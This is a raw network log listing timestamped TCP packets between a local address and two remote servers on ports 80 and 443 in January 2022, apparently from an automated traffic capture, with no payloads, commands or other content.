Jan 14, 2022 00:15:12.661443949 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661448002 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.661493063 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.661504984 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661566019 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661628008 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661686897 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.661689043 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661750078 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661819935 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661864042 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.661897898 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.661974907 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662048101 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662117004 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662189007 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662194967 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.662264109 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662333965 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662342072 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.662405014 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662421942 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.662466049 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662527084 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662585020 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.662585974 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662647963 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662708044 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.662708998 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662771940 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662828922 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.662832022 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662892103 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.662952900 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.662952900 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663022995 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663083076 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.663111925 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663182974 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663256884 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663269043 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.663316965 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.663321018 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663393021 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663461924 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663528919 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.663530111 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663594007 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663655996 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.663718939 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.663780928 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.714277029 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714344978 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714406967 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714458942 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714521885 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714528084 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.714566946 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.714572906 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714637995 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714716911 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714720964 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.714786053 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714859009 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714860916 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.714942932 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.714993000 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.715027094 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715087891 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715142012 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.715162039 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715221882 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715243101 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.715295076 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715361118 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715425968 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715465069 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.715492964 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715533972 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.715562105 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715629101 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715636015 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.715684891 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715735912 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715763092 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.715785980 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715840101 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715909958 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715915918 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.715981960 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.715986967 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.716047049 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716115952 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716125965 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.716182947 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716253996 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716322899 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716334105 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.716393948 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716399908 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.716461897 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716532946 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716603041 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716607094 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.716671944 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716674089 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.716743946 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716820955 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.716861010 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716922045 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.716988087 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.717057943 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.717061043 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.717127085 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.717128038 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.717214108 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.717282057 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.717351913 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.717356920 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.717420101 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.717423916 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.717483997 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.717751980 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.768234968 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768342972 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768393993 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768444061 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768449068 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.768492937 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768517971 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.768547058 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768605947 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.768609047 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768681049 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768748999 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768754959 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.768820047 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768891096 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768959045 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.768964052 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.769027948 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769037008 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.769099951 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769170046 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.769181013 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769289970 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769356012 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769391060 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.769423008 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769490004 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769505024 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.769572973 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769639015 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769669056 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.769709110 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769774914 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769812107 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.769836903 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.769962072 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770030975 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.770034075 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770101070 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.770109892 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770200014 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770273924 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770283937 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.770334959 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770391941 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770458937 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770463943 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.770525932 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770530939 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.770593882 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770658970 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770668030 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.770733118 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770804882 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770814896 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.770917892 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.770988941 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.771029949 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.771061897 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.771135092 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.771198034 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.771208048 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.771276951 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.771342993 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.771347046 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.771414042 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.771472931 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.771476030 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.771547079 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.771605968 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.771617889 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.772044897 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.822448969 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822491884 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822521925 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822551012 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822586060 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822592974 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.822611094 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822633028 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.822638988 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822668076 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822673082 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.822696924 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822724104 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822726011 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.822748899 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822772026 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822778940 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.822807074 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822822094 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822840929 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.822849989 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822879076 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822889090 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.822906971 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822938919 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822952032 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.822956085 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.822993994 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823008060 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823040962 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823070049 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823086023 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823097944 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823126078 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823131084 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823146105 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823174000 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823189020 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823199987 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823229074 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823235989 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823259115 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823288918 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823295116 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823318005 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823340893 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823343992 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823370934 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823395014 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823419094 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823422909 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823450089 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823453903 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823476076 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823503971 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823527098 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823530912 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823548079 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823556900 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823585033 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823610067 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823612928 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823642015 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823661089 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823671103 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823702097 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823718071 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823728085 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823757887 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823780060 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823784113 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823803902 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823826075 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823833942 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823833942 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823867083 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823882103 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823894024 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823905945 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823936939 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823964119 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.823966980 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.823995113 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.824018002 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.824023008 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.824049950 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.824067116 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.824074030 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.824137926 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.824197054 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.825212955 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.875689030 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.258037090 CET	49788	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.308645964 CET	80	49788	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.308765888 CET	49788	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.309730053 CET	49788	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.309753895 CET	49788	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.360244036 CET	80	49788	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.360908031 CET	80	49788	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.400315046 CET	80	49788	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.400501013 CET	49788	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.400712967 CET	49788	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.427756071 CET	49789	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.451637030 CET	80	49788	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.477989912 CET	80	49789	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.478092909 CET	49789	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.478214979 CET	49789	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.478471994 CET	49789	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.530045986 CET	80	49789	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.562634945 CET	80	49789	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.562805891 CET	49789	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.563021898 CET	49789	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.613387108 CET	80	49789	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.905303955 CET	49791	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.956150055 CET	80	49791	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:14.956253052 CET	49791	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.956361055 CET	49791	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:14.956391096 CET	49791	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.007066011 CET	80	49791	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.036398888 CET	80	49791	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.037935019 CET	49791	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.038434982 CET	49791	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.046808958 CET	49792	443	192.168.2.4	185.233.81.115
Jan 14, 2022 00:15:15.046853065 CET	443	49792	185.233.81.115	192.168.2.4
Jan 14, 2022 00:15:15.046938896 CET	49792	443	192.168.2.4	185.233.81.115
Jan 14, 2022 00:15:15.047993898 CET	49792	443	192.168.2.4	185.233.81.115
Jan 14, 2022 00:15:15.048019886 CET	443	49792	185.233.81.115	192.168.2.4
Jan 14, 2022 00:15:15.088867903 CET	80	49791	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.119153023 CET	443	49792	185.233.81.115	192.168.2.4
Jan 14, 2022 00:15:15.119254112 CET	49792	443	192.168.2.4	185.233.81.115
Jan 14, 2022 00:15:15.122911930 CET	49792	443	192.168.2.4	185.233.81.115
Jan 14, 2022 00:15:15.122931004 CET	443	49792	185.233.81.115	192.168.2.4
Jan 14, 2022 00:15:15.123487949 CET	443	49792	185.233.81.115	192.168.2.4
Jan 14, 2022 00:15:15.139647961 CET	49792	443	192.168.2.4	185.233.81.115
Jan 14, 2022 00:15:15.157376051 CET	443	49792	185.233.81.115	192.168.2.4
Jan 14, 2022 00:15:15.157484055 CET	443	49792	185.233.81.115	192.168.2.4
Jan 14, 2022 00:15:15.159519911 CET	49792	443	192.168.2.4	185.233.81.115
Jan 14, 2022 00:15:15.159559011 CET	49792	443	192.168.2.4	185.233.81.115
Jan 14, 2022 00:15:15.159584045 CET	443	49792	185.233.81.115	192.168.2.4
Jan 14, 2022 00:15:15.159600973 CET	49792	443	192.168.2.4	185.233.81.115
Jan 14, 2022 00:15:15.159611940 CET	443	49792	185.233.81.115	192.168.2.4
Jan 14, 2022 00:15:15.191968918 CET	49793	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.244185925 CET	80	49793	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.245773077 CET	49793	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.245913982 CET	49793	80	192.168.2.4	93.189.42.167
